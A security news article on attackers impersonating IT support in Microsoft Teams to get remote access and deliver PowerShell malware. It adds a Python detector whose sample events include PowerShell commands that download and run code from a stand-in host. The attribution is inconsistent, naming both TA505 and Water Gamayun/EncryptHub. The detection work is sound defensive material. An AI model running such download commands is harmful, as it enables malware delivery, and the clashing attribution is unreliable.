Hackers Exploit Microsoft Teams to Deliver PowerShell-Driven Malware and Gain Remote Access to Windows Systems
Cybersecurity Alert: Threat Actors Use Microsoft Teams to Deploy Malware
In a concerning development, cybercriminals have been found using Microsoft Teams to deploy malware and gain control of victim systems. This revelation comes from recent analyses by Permiso cybersecurity researchers, who have uncovered a multi-stage attack that begins with a simple message and culminates in the deployment of potent, multifunctional malware.
The financially motivated threat group TA505 is believed to be behind these attacks; the group has been linked to PowerShell-based malware delivered through Microsoft Teams. The malicious script, which can steal credentials, establish long-term persistence, and execute code remotely, is the primary tool used in these campaigns.
The attackers start by impersonating IT support staff in Microsoft Teams chats. They trick employees into granting remote access by building rapport and persuading them to install remote access software like QuickAssist or AnyDesk. To add authenticity, they often use checkmark emojis to simulate a verified status and leverage Microsoft's domain structure to appear as if they are part of the organization.
Once remote access is secured, the attacker executes a PowerShell command to download the primary malicious payload. Analysis of the payload's code revealed hardcoded encryption keys linking the campaign to the financially motivated threat actor tracked as Water Gamayun (also known as EncryptHub). This group has a history of combining sophisticated social engineering with custom malware to target English-speaking IT professionals and developers.
These newer campaigns are more direct, often forgoing the preliminary mass email campaigns seen in the past. The malware can designate its own process as "critical," so that terminating the process crashes the system. The malicious payloads in recent incidents have involved the DarkGate and Matanbuchus malware loaders.
To protect against these attacks, a defense-in-depth strategy, combining technical controls with robust user education, is essential. Employees must be trained to remain vigilant against unsolicited contact, even on trusted internal platforms. All requests for credentials or the installation of remote access software should be independently verified through a known, separate communication channel.
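One technical control for the chain described above, as an added example that is not part of the original article: correlate a remote-assistance tool launch (QuickAssist or AnyDesk) with a PowerShell download cradle run by the same user on the same host shortly afterwards, since the attacker types the download command inside the remote session rather than spawning it from the tool. The event fields, binary names and cradle patterns are assumptions, and the events are constructed sample data, not real telemetry.

```python
import ntpath
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "host": "ws01", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\QuickAssist.exe", "cmd": "QuickAssist.exe"},
    {"time": "2024-05-01T09:04:30", "host": "ws01", "user": "CORP\\alice", "image": PS_EXE,
     "cmd": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s1')\""},
    {"time": "2024-05-01T11:00:00", "host": "ws02", "user": "CORP\\bob", "image": PS_EXE,
     "cmd": "powershell -File C:\\scripts\\inventory.ps1"},  # benign admin script, no remote tool
    {"time": "2024-05-01T13:00:00", "host": "ws03", "user": "CORP\\carol",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmd": "AnyDesk.exe"},
    {"time": "2024-05-01T13:40:00", "host": "ws03", "user": "CORP\\carol", "image": PS_EXE,
     "cmd": "powershell -c \"Invoke-WebRequest http://example.invalid/x -OutFile x.exe\""},
]

# Assumed binary names of the remote-assistance tools named in the article.
REMOTE_TOOLS = {"quickassist.exe", "anydesk.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download-cradle fragments (assumed list; tune for your environment).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-restmethod|\birm\b|start-bitstransfer|\s-enc(?:odedcommand)?\b", re.IGNORECASE)

def find_remote_assist_chains(events, window_minutes=30):
    """Pair each remote-tool launch with any PowerShell download cradle run by the
    same user on the same host within window_minutes afterwards (parent lineage is not relied on)."""
    window = timedelta(minutes=window_minutes)
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    alerts = []
    for i, tool in enumerate(ordered):
        if ntpath.basename(tool["image"]).lower() not in REMOTE_TOOLS:
            continue
        t0 = datetime.fromisoformat(tool["time"])
        for ps in ordered[i + 1:]:
            t1 = datetime.fromisoformat(ps["time"])
            if t1 - t0 > window:
                break  # events are sorted, so nothing later can fall inside the window
            if (ps["host"], ps["user"]) != (tool["host"], tool["user"]):
                continue
            if ntpath.basename(ps["image"]).lower() in POWERSHELL and DOWNLOAD_CRADLE.search(ps["cmd"]):
                alerts.append((tool, ps))
    return alerts

if __name__ == "__main__":
    for tool, ps in find_remote_assist_chains(SAMPLE_EVENTS):
        print(f"{ps['host']} {ps['user']}: {ntpath.basename(tool['image'])} at {tool['time']}, PowerShell download at {ps['time']}")
```

With the default 30-minute window only the ws01 QuickAssist session is flagged; widening it to 60 minutes also catches the ws03 AnyDesk session, so the window is a tuning knob between coverage and noise.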
It is crucial to stay informed about the latest threats and to implement robust security measures to protect your organization from such attacks. By doing so, we can collectively work towards a safer digital environment.